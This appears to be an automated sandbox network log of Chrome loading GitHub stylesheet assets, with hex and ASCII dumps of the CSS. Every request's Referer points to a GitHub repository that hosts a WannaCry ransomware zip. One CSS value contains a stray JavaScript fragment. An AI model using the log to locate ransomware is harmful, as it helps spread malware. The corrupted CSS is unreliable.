                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 74 61 3a 20 23 63 32 39 37 66 66 3b 2d 2d 63 6f 6c 6f 72 2d 63 68 65 63 6b 73 2d 61 6e 73 69 2d 6d 61 67 65 6e 74 61 2d 62 72 69 67 68 74 3a 20 23 64 38 62 39 66 66 3b 2d 2d 63 6f 6c 6f 72 2d 63 68 65 63 6b 73 2d 61 6e 73 69 2d 63 79 61 6e 3a 20 23 37 36 65 33 65 61 3b 2d 2d 63 6f 6c 6f 72 2d 63 68 65 63 6b 73 2d 61 6e 73 69 2d 63 79 61 6e 2d 62 72 69 67 68 74 3a 20 23 62 33 66 30 66 66 3b 2d 2d 63 6f 6c 6f 72 2d 70 72 6f 6a 65 63 74 2d 68 65 61 64 65 72 2d 62 67 3a 20 23 32 34 32 39 32 66 3b 2d 2d 63 6f 6c 6f 72 2d 70 72 6f 6a 65 63 74 2d 73 69 64 65 62 61 72 2d 62 67 3a 20 23 66 66 66 66 66 66 3b 2d 2d 63 6f 6c 6f 72 2d 70 72 6f 6a 65 63 74 2d 67 72 61 64 69 65 6e 74 2d 69 6e 3a 20 23 66 66 66 66 66 66 3b 2d 2d 63 6f 6c 6f 72 2d 70 72 6f 6a 65 63 74 2d
                                                                                      Data Ascii: ta: #c297ff;--color-checks-ansi-magenta-bright: #d8b9ff;--color-checks-ansi-cyan: #76e3ea;--color-checks-ansi-cyan-bright: #b3f0ff;--color-project-header-bg: #24292f;--color-project-sidebar-bg: #ffffff;--color-project-gradient-in: #ffffff;--color-project-
                                                                                      2024-03-23 14:47:21 UTC14859INData Raw: 35 39 66 3b 2d 2d 63 6f 6c 6f 72 2d 63 68 65 63 6b 73 2d 69 6e 70 75 74 2d 62 67 3a 20 23 33 32 33 38 33 66 3b 2d 2d 63 6f 6c 6f 72 2d 63 68 65 63 6b 73 2d 69 6e 70 75 74 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 2d 2d 63 6f 6c 6f 72 2d 63 68 65 63 6b 73 2d 64 6f 6e 75 74 2d 65 72 72 6f 72 3a 20 23 66 61 34 35 34 39 3b 2d 2d 63 6f 6c 6f 72 2d 63 68 65 63 6b 73 2d 64 6f 6e 75 74 2d 70 65 6e 64 69 6e 67 3a 20 23 62 66 38 37 30 30 3b 2d 2d 63 6f 6c 6f 72 2d 63 68 65 63 6b 73 2d 64 6f 6e 75 74 2d 73 75 63 63 65 73 73 3a 20 23 31 66 38 38 33 64 3b 2d 2d 63 6f 6c 6f 72 2d 63 68 65 63 6b 73 2d 64 6f 6e 75 74 2d 6e 65 75 74 72 61 6c 3a 20 23 61 66 62 38 63 31 3b 2d 2d 63 6f 6c 6f 72 2d 63 68 65 63 6b 73 2d 64 72 6f 70 64 6f 77 6e 2d 74 65 78 74 3a 20 23 61 66 62
                                                                                      Data Ascii: 59f;--color-checks-input-bg: #32383f;--color-checks-input-shadow: none;--color-checks-donut-error: #fa4549;--color-checks-donut-pending: #bf8700;--color-checks-donut-success: #1f883d;--color-checks-donut-neutral: #afb8c1;--color-checks-dropdown-text: #afb


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.1649704185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:21 UTC655OUTGET /assets/dark-a167e256da9c.css HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: text/css,*/*;q=0.1
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: style
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:21 UTC676INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 113052
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: text/css
                                                                                      Last-Modified: Wed, 24 Jan 2024 14:36:34 GMT
                                                                                      ETag: 0x8DC1CE9DD51FA52
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:21 GMT
                                                                                      Age: 2601280
                                                                                      X-Served-By: cache-iad-kiad7000046-IAD, cache-lga21940-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 3906, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 755635397bed8fd5280f7852e78e4361f1809369
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 6c 69 67 68 74 5d 5b 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 64 61 72 6b 5d 2c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 6c 69 67 68 74 5d 5b 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 64 61 72 6b 5d 3a 3a 73 65 6c 65 63 74 69 6f 6e 2c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 64 61 72 6b 5d 5b 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 64 61 72 6b 5d 2c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 64 61 72 6b 5d 5b 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 64 61 72 6b 5d 3a 3a 73 65 6c 65 63 74 69 6f 6e 7b 2d 2d 63 6f 6c 6f 72 2d 63 61 6e 76 61 73 2d 64 65 66 61 75 6c 74 2d 74 72 61 6e 73 70 61 72 65 6e 74 3a 20 72 67 62 61 28 31 33 2c 31 37 2c 32 33
                                                                                      Data Ascii: [data-color-mode=light][data-light-theme=dark],[data-color-mode=light][data-light-theme=dark]::selection,[data-color-mode=dark][data-dark-theme=dark],[data-color-mode=dark][data-dark-theme=dark]::selection{--color-canvas-default-transparent: rgba(13,17,23
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 73 63 61 6c 65 2d 67 72 61 79 2d 39 3a 20 23 30 64 31 31 31 37 3b 2d 2d 63 6f 6c 6f 72 2d 73 63 61 6c 65 2d 62 6c 75 65 2d 30 3a 20 23 63 61 65 38 66 66 3b 2d 2d 63 6f 6c 6f 72 2d 73 63 61 6c 65 2d 62 6c 75 65 2d 31 3a 20 23 61 35 64 36 66 66 3b 2d 2d 63 6f 6c 6f 72 2d 73 63 61 6c 65 2d 62 6c 75 65 2d 32 3a 20 23 37 39 63 30 66 66 3b 2d 2d 63 6f 6c 6f 72 2d 73 63 61 6c 65 2d 62 6c 75 65 2d 33 3a 20 23 35 38 61 36 66 66 3b 2d 2d 63 6f 6c 6f 72 2d 73 63 61 6c 65 2d 62 6c 75 65 2d 34 3a 20 23 33 38 38 62 66 64 3b 2d 2d 63 6f 6c 6f 72 2d 73 63 61 6c 65 2d 62 6c 75 65 2d 35 3a 20 23 31 66 36 66 65 62 3b 2d 2d 63 6f 6c 6f 72 2d 73 63 61 6c 65 2d 62 6c 75 65 2d 36 3a 20 23 31 31 35 38 63 37 3b 2d 2d 63 6f 6c 6f 72 2d 73 63 61 6c 65 2d 62 6c 75 65 2d 37 3a 20 23
                                                                                      Data Ascii: scale-gray-9: #0d1117;--color-scale-blue-0: #cae8ff;--color-scale-blue-1: #a5d6ff;--color-scale-blue-2: #79c0ff;--color-scale-blue-3: #58a6ff;--color-scale-blue-4: #388bfd;--color-scale-blue-5: #1f6feb;--color-scale-blue-6: #1158c7;--color-scale-blue-7: #
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 6c 6f 72 2d 63 61 6e 76 61 73 2d 64 65 66 61 75 6c 74 3a 20 23 30 64 31 31 31 37 3b 2d 2d 63 6f 6c 6f 72 2d 63 61 6e 76 61 73 2d 6f 76 65 72 6c 61 79 3a 20 23 31 36 31 62 32 32 3b 2d 2d 63 6f 6c 6f 72 2d 63 61 6e 76 61 73 2d 69 6e 73 65 74 3a 20 23 30 31 30 34 30 39 3b 2d 2d 63 6f 6c 6f 72 2d 63 61 6e 76 61 73 2d 73 75 62 74 6c 65 3a 20 23 31 36 31 62 32 32 3b 2d 2d 63 6f 6c 6f 72 2d 62 6f 72 64 65 72 2d 64 65 66 61 75 6c 74 3a 20 23 33 30 33 36 33 64 3b 2d 2d 63 6f 6c 6f 72 2d 62 6f 72 64 65 72 2d 6d 75 74 65 64 3a 20 23 32 31 32 36 32 64 3b 2d 2d 63 6f 6c 6f 72 2d 62 6f 72 64 65 72 2d 73 75 62 74 6c 65 3a 20 72 67 62 61 28 32 34 30 2c 32 34 36 2c 32 35 32 2c 30 2e 31 29 3b 2d 2d 63 6f 6c 6f 72 2d 73 68 61 64 6f 77 2d 73 6d 61 6c 6c 3a 20 30 20 30 20 74
                                                                                      Data Ascii: lor-canvas-default: #0d1117;--color-canvas-overlay: #161b22;--color-canvas-inset: #010409;--color-canvas-subtle: #161b22;--color-border-default: #30363d;--color-border-muted: #21262d;--color-border-subtle: rgba(240,246,252,0.1);--color-shadow-small: 0 0 t
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 3b 2d 2d 63 6f 6c 6f 72 2d 62 74 6e 2d 64 61 6e 67 65 72 2d 64 69 73 61 62 6c 65 64 2d 62 67 3a 20 23 30 64 31 31 31 37 3b 2d 2d 63 6f 6c 6f 72 2d 62 74 6e 2d 64 61 6e 67 65 72 2d 64 69 73 61 62 6c 65 64 2d 63 6f 75 6e 74 65 72 2d 62 67 3a 20 72 67 62 61 28 32 31 38 2c 35 34 2c 35 31 2c 30 2e 30 35 29 3b 2d 2d 63 6f 6c 6f 72 2d 62 74 6e 2d 64 61 6e 67 65 72 2d 63 6f 75 6e 74 65 72 2d 62 67 3a 20 72 67 62 61 28 37 33 2c 32 2c 32 2c 30 2e 32 29 3b 2d 2d 63 6f 6c 6f 72 2d 62 74 6e 2d 64 61 6e 67 65 72 2d 69 63 6f 6e 3a 20 23 66 38 35 31 34 39 3b 2d 2d 63 6f 6c 6f 72 2d 62 74 6e 2d 64 61 6e 67 65 72 2d 63 6f 75 6e 74 65 72 2d 66 67 3a 20 23 66 38 35 31 34 39 3b 2d 2d 63 6f 6c 6f 72 2d 62 74 6e 2d 64 61 6e 67 65 72 2d 64 69 73 61 62 6c 65 64 2d 63 6f 75 6e 74
                                                                                      Data Ascii: ;--color-btn-danger-disabled-bg: #0d1117;--color-btn-danger-disabled-counter-bg: rgba(218,54,51,0.05);--color-btn-danger-counter-bg: rgba(73,2,2,0.2);--color-btn-danger-icon: #f85149;--color-btn-danger-counter-fg: #f85149;--color-btn-danger-disabled-count
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 72 61 6e 73 70 61 72 65 6e 74 3b 2d 2d 63 6f 6c 6f 72 2d 62 74 6e 2d 69 6e 73 65 74 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 2d 2d 63 6f 6c 6f 72 2d 62 74 6e 2d 68 6f 76 65 72 2d 62 67 3a 20 23 33 30 33 36 33 64 3b 2d 2d 63 6f 6c 6f 72 2d 62 74 6e 2d 68 6f 76 65 72 2d 62 6f 72 64 65 72 3a 20 23 38 62 39 34 39 65 3b 2d 2d 63 6f 6c 6f 72 2d 62 74 6e 2d 61 63 74 69 76 65 2d 62 67 3a 20 68 73 6c 61 28 32 31 32 2c 31 32 25 2c 31 38 25 2c 31 29 3b 2d 2d 63 6f 6c 6f 72 2d 62 74 6e 2d 61 63 74 69 76 65 2d 62 6f 72 64 65 72 3a 20 23 36 65 37 36 38 31 3b 2d 2d 63 6f 6c 6f 72 2d 62 74 6e 2d 73 65 6c 65 63 74 65 64 2d 62 67 3a 20 23 31 36 31 62 32 32 3b 2d 2d 63 6f 6c 6f 72 2d 62 74 6e 2d 63 6f 75 6e 74 65 72 2d 62 67 3a 20 23 33 30
                                                                                      Data Ascii: ransparent;--color-btn-inset-shadow: 0 0 transparent;--color-btn-hover-bg: #30363d;--color-btn-hover-border: #8b949e;--color-btn-active-bg: hsla(212,12%,18%,1);--color-btn-active-border: #6e7681;--color-btn-selected-bg: #161b22;--color-btn-counter-bg: #30
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 68 65 63 6b 73 2d 61 6e 73 69 2d 6d 61 67 65 6e 74 61 3a 20 23 62 63 38 63 66 66 3b 2d 2d 63 6f 6c 6f 72 2d 63 68 65 63 6b 73 2d 61 6e 73 69 2d 6d 61 67 65 6e 74 61 2d 62 72 69 67 68 74 3a 20 23 64 32 61 38 66 66 3b 2d 2d 63 6f 6c 6f 72 2d 63 68 65 63 6b 73 2d 61 6e 73 69 2d 63 79 61 6e 3a 20 23 37 36 65 33 65 61 3b 2d 2d 63 6f 6c 6f 72 2d 63 68 65 63 6b 73 2d 61 6e 73 69 2d 63 79 61 6e 2d 62 72 69 67 68 74 3a 20 23 62 33 66 30 66 66 3b 2d 2d 63 6f 6c 6f 72 2d 70 72 6f 6a 65 63 74 2d 68 65 61 64 65 72 2d 62 67 3a 20 23 30 64 31 31 31 37 3b 2d 2d 63 6f 6c 6f 72 2d 70 72 6f 6a 65 63 74 2d 73 69 64 65 62 61 72 2d 62 67 3a 20 23 31 36 31 62 32 32 3b 2d 2d 63 6f 6c 6f 72 2d 70 72 6f 6a 65 63 74 2d 67 72 61 64 69 65 6e 74 2d 69 6e 3a 20 23 31 36 31 62 32 32 3b
                                                                                      Data Ascii: hecks-ansi-magenta: #bc8cff;--color-checks-ansi-magenta-bright: #d2a8ff;--color-checks-ansi-cyan: #76e3ea;--color-checks-ansi-cyan-bright: #b3f0ff;--color-project-header-bg: #0d1117;--color-project-sidebar-bg: #161b22;--color-project-gradient-in: #161b22;
                                                                                      2024-03-23 14:47:21 UTC14748INData Raw: 65 63 6b 73 2d 69 6e 70 75 74 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 31 70 78 20 28 6f 62 6a 29 20 3d 3e 20 28 30 2c 20 67 65 74 5f 31 2e 64 65 66 61 75 6c 74 29 28 6f 62 6a 2c 20 70 61 74 68 29 3b 2d 2d 63 6f 6c 6f 72 2d 63 68 65 63 6b 73 2d 64 6f 6e 75 74 2d 65 72 72 6f 72 3a 20 23 66 38 35 31 34 39 3b 2d 2d 63 6f 6c 6f 72 2d 63 68 65 63 6b 73 2d 64 6f 6e 75 74 2d 70 65 6e 64 69 6e 67 3a 20 23 64 32 39 39 32 32 3b 2d 2d 63 6f 6c 6f 72 2d 63 68 65 63 6b 73 2d 64 6f 6e 75 74 2d 73 75 63 63 65 73 73 3a 20 23 32 65 61 30 34 33 3b 2d 2d 63 6f 6c 6f 72 2d 63 68 65 63 6b 73 2d 64 6f 6e 75 74 2d 6e 65 75 74 72 61 6c 3a 20 23 38 62 39 34 39 65 3b 2d 2d 63 6f 6c 6f 72 2d 63 68 65 63 6b 73 2d 64 72 6f 70 64 6f 77 6e 2d 74 65 78 74 3a 20 23 65 36 65 64 66 33
                                                                                      Data Ascii: ecks-input-shadow: 0 0 0 1px (obj) => (0, get_1.default)(obj, path);--color-checks-donut-error: #f85149;--color-checks-donut-pending: #d29922;--color-checks-donut-success: #2ea043;--color-checks-donut-neutral: #8b949e;--color-checks-dropdown-text: #e6edf3


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.1649705185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:21 UTC668OUTGET /assets/primer-primitives-366b5c973fad.css HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: text/css,*/*;q=0.1
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: style
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:21 UTC673INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 8022
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: text/css
                                                                                      Last-Modified: Tue, 19 Mar 2024 18:00:01 GMT
                                                                                      ETag: 0x8DC483E6635234F
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:21 GMT
                                                                                      Age: 325842
                                                                                      X-Served-By: cache-iad-kjyo7100135-IAD, cache-ewr18153-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 1391, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: f5a2ff33586112fd9dbfc57e2c04b8a6ad5e37e2
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 3a 72 6f 6f 74 20 7b 0a 20 20 2d 2d 62 61 73 65 2d 73 69 7a 65 2d 34 3a 20 30 2e 32 35 72 65 6d 3b 0a 20 20 2d 2d 62 61 73 65 2d 73 69 7a 65 2d 38 3a 20 30 2e 35 72 65 6d 3b 0a 20 20 2d 2d 62 61 73 65 2d 73 69 7a 65 2d 31 32 3a 20 30 2e 37 35 72 65 6d 3b 0a 20 20 2d 2d 62 61 73 65 2d 73 69 7a 65 2d 31 36 3a 20 31 72 65 6d 3b 0a 20 20 2d 2d 62 61 73 65 2d 73 69 7a 65 2d 32 30 3a 20 31 2e 32 35 72 65 6d 3b 0a 20 20 2d 2d 62 61 73 65 2d 73 69 7a 65 2d 32 34 3a 20 31 2e 35 72 65 6d 3b 0a 20 20 2d 2d 62 61 73 65 2d 73 69 7a 65 2d 32 38 3a 20 31 2e 37 35 72 65 6d 3b 0a 20 20 2d 2d 62 61 73 65 2d 73 69 7a 65 2d 33 32 3a 20 32 72 65 6d 3b 0a 20 20 2d 2d 62 61 73 65 2d 73 69 7a 65 2d 33 36 3a 20 32 2e 32 35 72 65 6d 3b 0a 20 20 2d 2d 62 61 73 65 2d 73 69 7a 65 2d
                                                                                      Data Ascii: :root { --base-size-4: 0.25rem; --base-size-8: 0.5rem; --base-size-12: 0.75rem; --base-size-16: 1rem; --base-size-20: 1.25rem; --base-size-24: 1.5rem; --base-size-28: 1.75rem; --base-size-32: 2rem; --base-size-36: 2.25rem; --base-size-
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 2d 2d 63 6f 6e 74 72 6f 6c 53 74 61 63 6b 2d 73 6d 61 6c 6c 2d 67 61 70 2d 61 75 74 6f 3a 20 31 72 65 6d 3b 0a 20 20 20 20 2d 2d 63 6f 6e 74 72 6f 6c 53 74 61 63 6b 2d 6d 65 64 69 75 6d 2d 67 61 70 2d 61 75 74 6f 3a 20 30 2e 37 35 72 65 6d 3b 0a 20 20 7d 0a 7d 0a 0a 40 6d 65 64 69 61 20 28 70 6f 69 6e 74 65 72 3a 20 66 69 6e 65 29 20 7b 0a 20 20 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 2d 2d 63 6f 6e 74 72 6f 6c 2d 6d 69 6e 54 61 72 67 65 74 2d 61 75 74 6f 3a 20 31 72 65 6d 3b 0a 20 20 20 20 2d 2d 63 6f 6e 74 72 6f 6c 53 74 61 63 6b 2d 73 6d 61 6c 6c 2d 67 61 70 2d 61 75 74 6f 3a 20 30 2e 35 72 65 6d 3b 0a 20 20 20 20 2d 2d 63 6f 6e 74 72 6f 6c 53 74 61 63 6b 2d 6d 65 64 69 75 6d 2d 67 61 70 2d 61 75 74 6f 3a 20 30 2e 35 72 65 6d 3b 0a 20 20 7d 0a 7d 0a 0a 3a
                                                                                      Data Ascii: --controlStack-small-gap-auto: 1rem; --controlStack-medium-gap-auto: 0.75rem; }}@media (pointer: fine) { :root { --control-minTarget-auto: 1rem; --controlStack-small-gap-auto: 0.5rem; --controlStack-medium-gap-auto: 0.5rem; }}:
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 67 49 6e 6c 69 6e 65 2d 73 70 61 63 69 6f 75 73 3a 20 31 72 65 6d 3b 0a 20 20 2d 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 72 67 65 2d 67 61 70 3a 20 30 2e 35 72 65 6d 3b 0a 20 20 2d 2d 63 6f 6e 74 72 6f 6c 2d 78 6c 61 72 67 65 2d 73 69 7a 65 3a 20 33 72 65 6d 3b 0a 20 20 2d 2d 63 6f 6e 74 72 6f 6c 2d 78 6c 61 72 67 65 2d 6c 69 6e 65 42 6f 78 48 65 69 67 68 74 3a 20 31 2e 32 35 72 65 6d 3b 0a 20 20 2d 2d 63 6f 6e 74 72 6f 6c 2d 78 6c 61 72 67 65 2d 70 61 64 64 69 6e 67 42 6c 6f 63 6b 3a 20 30 2e 38 37 35 72 65 6d 3b 0a 20 20 2d 2d 63 6f 6e 74 72 6f 6c 2d 78 6c 61 72 67 65 2d 70 61 64 64 69 6e 67 49 6e 6c 69 6e 65 2d 6e 6f 72 6d 61 6c 3a 20 30 2e 37 35 72 65 6d 3b 0a 20 20 2d 2d 63 6f 6e 74 72 6f 6c 2d 78 6c 61 72 67 65 2d 70 61 64 64 69 6e 67 49 6e 6c 69 6e 65 2d
                                                                                      Data Ascii: gInline-spacious: 1rem; --control-large-gap: 0.5rem; --control-xlarge-size: 3rem; --control-xlarge-lineBoxHeight: 1.25rem; --control-xlarge-paddingBlock: 0.875rem; --control-xlarge-paddingInline-normal: 0.75rem; --control-xlarge-paddingInline-
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 76 65 72 6c 61 79 2d 68 65 69 67 68 74 2d 78 6c 61 72 67 65 3a 20 33 37 2e 35 72 65 6d 3b 0a 20 20 2d 2d 6f 76 65 72 6c 61 79 2d 70 61 64 64 69 6e 67 2d 6e 6f 72 6d 61 6c 3a 20 31 72 65 6d 3b 0a 20 20 2d 2d 6f 76 65 72 6c 61 79 2d 70 61 64 64 69 6e 67 2d 63 6f 6e 64 65 6e 73 65 64 3a 20 30 2e 35 72 65 6d 3b 0a 20 20 2d 2d 6f 76 65 72 6c 61 79 2d 70 61 64 64 69 6e 67 42 6c 6f 63 6b 2d 63 6f 6e 64 65 6e 73 65 64 3a 20 30 2e 32 35 72 65 6d 3b 0a 20 20 2d 2d 6f 76 65 72 6c 61 79 2d 70 61 64 64 69 6e 67 42 6c 6f 63 6b 2d 6e 6f 72 6d 61 6c 3a 20 30 2e 37 35 72 65 6d 3b 0a 20 20 2d 2d 6f 76 65 72 6c 61 79 2d 62 6f 72 64 65 72 52 61 64 69 75 73 3a 20 30 2e 33 37 35 72 65 6d 3b 0a 20 20 2d 2d 6f 76 65 72 6c 61 79 2d 6f 66 66 73 65 74 3a 20 30 2e 32 35 72 65 6d 3b
                                                                                      Data Ascii: verlay-height-xlarge: 37.5rem; --overlay-padding-normal: 1rem; --overlay-padding-condensed: 0.5rem; --overlay-paddingBlock-condensed: 0.25rem; --overlay-paddingBlock-normal: 0.75rem; --overlay-borderRadius: 0.375rem; --overlay-offset: 0.25rem;
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 69 75 6d 3a 20 31 2e 32 35 72 65 6d 3b 0a 20 20 2d 2d 74 65 78 74 2d 74 69 74 6c 65 2d 73 69 7a 65 2d 6c 61 72 67 65 3a 20 32 72 65 6d 3b 0a 20 20 2d 2d 74 65 78 74 2d 64 69 73 70 6c 61 79 2d 6c 69 6e 65 48 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 2d 2d 74 65 78 74 2d 64 69 73 70 6c 61 79 2d 73 69 7a 65 3a 20 32 2e 35 72 65 6d 3b 0a 20 20 2d 2d 74 65 78 74 2d 64 69 73 70 6c 61 79 2d 6c 69 6e 65 42 6f 78 48 65 69 67 68 74 3a 20 33 2e 35 72 65 6d 3b 0a 20 20 2d 2d 66 6f 6e 74 53 74 61 63 6b 2d 6d 6f 6e 6f 73 70 61 63 65 3a 20 75 69 2d 6d 6f 6e 6f 73 70 61 63 65 2c 20 53 46 4d 6f 6e 6f 2d 52 65 67 75 6c 61 72 2c 20 53 46 20 4d 6f 6e 6f 2c 20 4d 65 6e 6c 6f 2c 20 43 6f 6e 73 6f 6c 61 73 2c 20 4c 69 62 65 72 61 74 69 6f 6e 20 4d 6f 6e 6f 2c 20 6d 6f 6e 6f 73
                                                                                      Data Ascii: ium: 1.25rem; --text-title-size-large: 2rem; --text-display-lineHeight: 1.4; --text-display-size: 2.5rem; --text-display-lineBoxHeight: 3.5rem; --fontStack-monospace: ui-monospace, SFMono-Regular, SF Mono, Menlo, Consolas, Liberation Mono, monos
                                                                                      2024-03-23 14:47:21 UTC1132INData Raw: 66 6f 6e 74 53 74 61 63 6b 2d 73 61 6e 73 53 65 72 69 66 29 3b 0a 20 20 2d 2d 74 65 78 74 2d 62 6f 64 79 2d 73 68 6f 72 74 68 61 6e 64 2d 6d 65 64 69 75 6d 3a 20 76 61 72 28 2d 2d 74 65 78 74 2d 62 6f 64 79 2d 77 65 69 67 68 74 29 20 76 61 72 28 2d 2d 74 65 78 74 2d 62 6f 64 79 2d 73 69 7a 65 2d 6d 65 64 69 75 6d 29 2f 76 61 72 28 2d 2d 74 65 78 74 2d 62 6f 64 79 2d 6c 69 6e 65 48 65 69 67 68 74 2d 6d 65 64 69 75 6d 29 20 76 61 72 28 2d 2d 66 6f 6e 74 53 74 61 63 6b 2d 73 61 6e 73 53 65 72 69 66 29 3b 0a 20 20 2d 2d 74 65 78 74 2d 62 6f 64 79 2d 73 68 6f 72 74 68 61 6e 64 2d 6c 61 72 67 65 3a 20 76 61 72 28 2d 2d 74 65 78 74 2d 62 6f 64 79 2d 77 65 69 67 68 74 29 20 76 61 72 28 2d 2d 74 65 78 74 2d 62 6f 64 79 2d 73 69 7a 65 2d 6c 61 72 67 65 29 2f 76 61
                                                                                      Data Ascii: fontStack-sansSerif); --text-body-shorthand-medium: var(--text-body-weight) var(--text-body-size-medium)/var(--text-body-lineHeight-medium) var(--fontStack-sansSerif); --text-body-shorthand-large: var(--text-body-weight) var(--text-body-size-large)/va


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.1649706185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:21 UTC657OUTGET /assets/global-c2f8efb9bce8.css HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: text/css,*/*;q=0.1
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: style
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:21 UTC673INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 287700
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: text/css
                                                                                      Last-Modified: Thu, 21 Mar 2024 19:18:45 GMT
                                                                                      ETag: 0x8DC49DBBA3BD3B4
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:21 GMT
                                                                                      Age: 144088
                                                                                      X-Served-By: cache-iad-kiad7000168-IAD, cache-lga21941-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 73, 1
                                                                                      Vary: Accept-Encoding
